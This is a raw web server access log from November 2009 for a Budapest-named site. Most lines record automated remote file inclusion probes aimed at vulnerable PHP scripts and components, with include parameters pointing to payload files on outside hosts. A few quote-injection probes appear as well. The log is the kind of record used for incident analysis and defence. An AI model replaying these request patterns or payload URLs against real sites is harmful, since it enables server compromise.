114.4.8.14 - - [02/Nov/2009:02:09:07 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:02:09:27 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:02:09:27 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:02:09:27 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
124.115.6.11 - - [02/Nov/2009:03:30:59 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "budapestcapital.com"
202.123.212.188 - - [02/Nov/2009:03:43:34 -0800] "GET /logs/access_090401.log//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [02/Nov/2009:03:43:34 -0800] "GET /logs//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [02/Nov/2009:03:43:37 -0800] "GET /main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [02/Nov/2009:03:43:53 -0800] "GET /main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [02/Nov/2009:03:43:53 -0800] "GET /logs//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [02/Nov/2009:03:43:56 -0800] "GET /logs/access_090401.log%20%20//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [02/Nov/2009:03:44:53 -0800] "GET /logs/access_090331.log//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
86.65.110.157 - - [02/Nov/2009:03:46:57 -0800] "GET /logs/access_090401.log//main.php?sayfa=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.budapestcapital.com"
86.65.110.157 - - [02/Nov/2009:03:47:00 -0800] "GET /main.php?sayfa=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.budapestcapital.com"
86.65.110.157 - - [02/Nov/2009:03:47:00 -0800] "GET /logs//main.php?sayfa=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.budapestcapital.com"
202.123.212.188 - - [02/Nov/2009:03:47:47 -0800] "GET /logs/access_090331.log%20%20//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.195.112.125 - - [02/Nov/2009:03:59:32 -0800] "GET /logs/ HTTP/1.0" 200 3353 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.budapestcapital.com"
64.150.183.219 - - [02/Nov/2009:04:15:49 -0800] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
64.150.183.219 - - [02/Nov/2009:04:15:49 -0800] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
64.150.183.219 - - [02/Nov/2009:04:15:49 -0800] "GET /logs/access_090329.log%20%20//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
91.192.20.164 - - [02/Nov/2009:04:16:34 -0800] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
91.192.20.164 - - [02/Nov/2009:04:16:34 -0800] "GET /logs/access_090329.log%20%20//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
91.192.20.164 - - [02/Nov/2009:04:16:34 -0800] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
64.150.183.219 - - [02/Nov/2009:04:18:49 -0800] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
64.150.183.219 - - [02/Nov/2009:04:18:49 -0800] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
64.150.183.219 - - [02/Nov/2009:04:18:54 -0800] "GET /logs/access_090329.log//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:19:41 -0800] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:19:41 -0800] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:19:46 -0800] "GET /logs/access_090329.log//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:21:52 -0800] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:21:52 -0800] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:21:58 -0800] "GET /logs/access_090329.log//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:04:29:02 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:04:29:02 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:04:29:02 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
209.200.237.152 - - [02/Nov/2009:04:31:25 -0800] "GET /header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
209.200.237.152 - - [02/Nov/2009:04:31:25 -0800] "GET /header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
209.200.237.152 - - [02/Nov/2009:04:32:26 -0800] "GET /logs/access_090401.log//header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
209.200.237.152 - - [02/Nov/2009:04:32:27 -0800] "GET /header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
209.200.237.152 - - [02/Nov/2009:04:32:27 -0800] "GET /logs//header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
209.200.237.152 - - [02/Nov/2009:04:32:28 -0800] "GET /logs/access_090401.log//header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
209.200.237.152 - - [02/Nov/2009:04:32:28 -0800] "GET /header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
209.200.237.152 - - [02/Nov/2009:04:32:28 -0800] "GET /logs//header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
209.200.237.152 - - [02/Nov/2009:04:32:36 -0800] "GET /logs/access_090331.log//header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
209.200.237.152 - - [02/Nov/2009:04:32:38 -0800] "GET /logs/access_090331.log//header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
125.251.99.2 - - [02/Nov/2009:04:38:00 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [02/Nov/2009:04:38:00 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [02/Nov/2009:04:38:00 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:42:10 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:42:10 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:42:10 -0800] "GET /logs/access_090329.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:42:14 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:42:15 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:42:15 -0800] "GET /logs/access_090329.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.budapestcapital.com"
113.52.152.25 - - [02/Nov/2009:04:42:32 -0800] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
113.52.152.25 - - [02/Nov/2009:04:42:33 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
113.52.152.25 - - [02/Nov/2009:04:42:33 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:46:38 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:46:38 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:46:38 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:49:13 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:49:13 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:49:13 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [02/Nov/2009:04:51:46 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [02/Nov/2009:04:52:00 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [02/Nov/2009:04:52:00 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:57:20 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:57:20 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:57:20 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
64.150.183.219 - - [02/Nov/2009:04:57:58 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
64.150.183.219 - - [02/Nov/2009:04:57:58 -0800] "GET /logs/access_090329.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
64.150.183.219 - - [02/Nov/2009:04:57:58 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
91.192.20.164 - - [02/Nov/2009:04:58:28 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
91.192.20.164 - - [02/Nov/2009:04:58:28 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
91.192.20.164 - - [02/Nov/2009:04:58:28 -0800] "GET /logs/access_090329.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:59:48 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:59:51 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:04:59:51 -0800] "GET /logs/access_090329.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:59:55 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:59:55 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [02/Nov/2009:04:59:55 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
113.52.152.25 - - [02/Nov/2009:05:00:43 -0800] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
91.192.20.164 - - [02/Nov/2009:05:00:48 -0800] "GET /logs/access_090531.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:05:00:56 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:05:00:56 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.97.189.33 - - [02/Nov/2009:05:00:56 -0800] "GET /logs/access_090329.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
64.150.183.219 - - [02/Nov/2009:05:01:15 -0800] "GET /logs/access_090531.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.17.19.172 - - [02/Nov/2009:05:08:12 -0800] "GET /skin/zero_vote/error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.17.19.172 - - [02/Nov/2009:05:08:12 -0800] "GET /logs/access_090329.log%20%20/skin/zero_vote/error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.17.19.172 - - [02/Nov/2009:05:08:12 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.17.19.172 - - [02/Nov/2009:05:08:21 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.17.19.172 - - [02/Nov/2009:05:08:21 -0800] "GET /logs/access_090329.log%20%20/skin/zero_vote/error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.17.19.172 - - [02/Nov/2009:05:08:24 -0800] "GET /skin/zero_vote/error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [02/Nov/2009:05:12:16 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [02/Nov/2009:05:12:16 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [02/Nov/2009:05:12:17 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:15:59 -0800] "GET /logs/access_090329.log%20%20/index/wp-content/plugins/Enigma2.php?boarddir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:15:59 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:15:59 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:15:59 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:15:59 -0800] "GET /logs/access_090329.log%20%20/index/wp-content/plugins/Enigma2.php?boarddir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:16:02 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:17:30 -0800] "GET /logs/access_090329.log/index/wp-content/plugins/Enigma2.php?boarddir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:17:30 -0800] "GET /logs/access.log/index/wp-content/plugins/Enigma2.php?boarddir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
80.93.57.123 - - [02/Nov/2009:05:17:39 -0800] "GET /logs/?sourcedir=http://3gsmdb.com/opkt/.safe??? HTTP/1.1" 200 3369 "-" "libwww-perl/5.820" "www.budapestcapital.com"
80.93.57.123 - - [02/Nov/2009:05:17:40 -0800] "GET /logs/access_090331.log%20/?sourcedir=http://3gsmdb.com/opkt/.safe??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.budapestcapital.com"
80.93.57.123 - - [02/Nov/2009:05:17:40 -0800] "GET /?sourcedir=http://3gsmdb.com/opkt/.safe??? HTTP/1.1" 200 916 "-" "libwww-perl/5.820" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:17:44 -0800] "GET /logs/access_090329.log/index/wp-content/plugins/Enigma2.php?boarddir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:17:44 -0800] "GET /logs/access.log/index/wp-content/plugins/Enigma2.php?boarddir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:20:29 -0800] "GET /logs/access_090301.log%20%20/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:20:29 -0800] "GET /plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:20:29 -0800] "GET /logs/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:20:45 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:20:45 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:20:45 -0800] "GET /logs/access_090329.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [02/Nov/2009:05:20:45 -0800] "GET /logs/access_090301.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
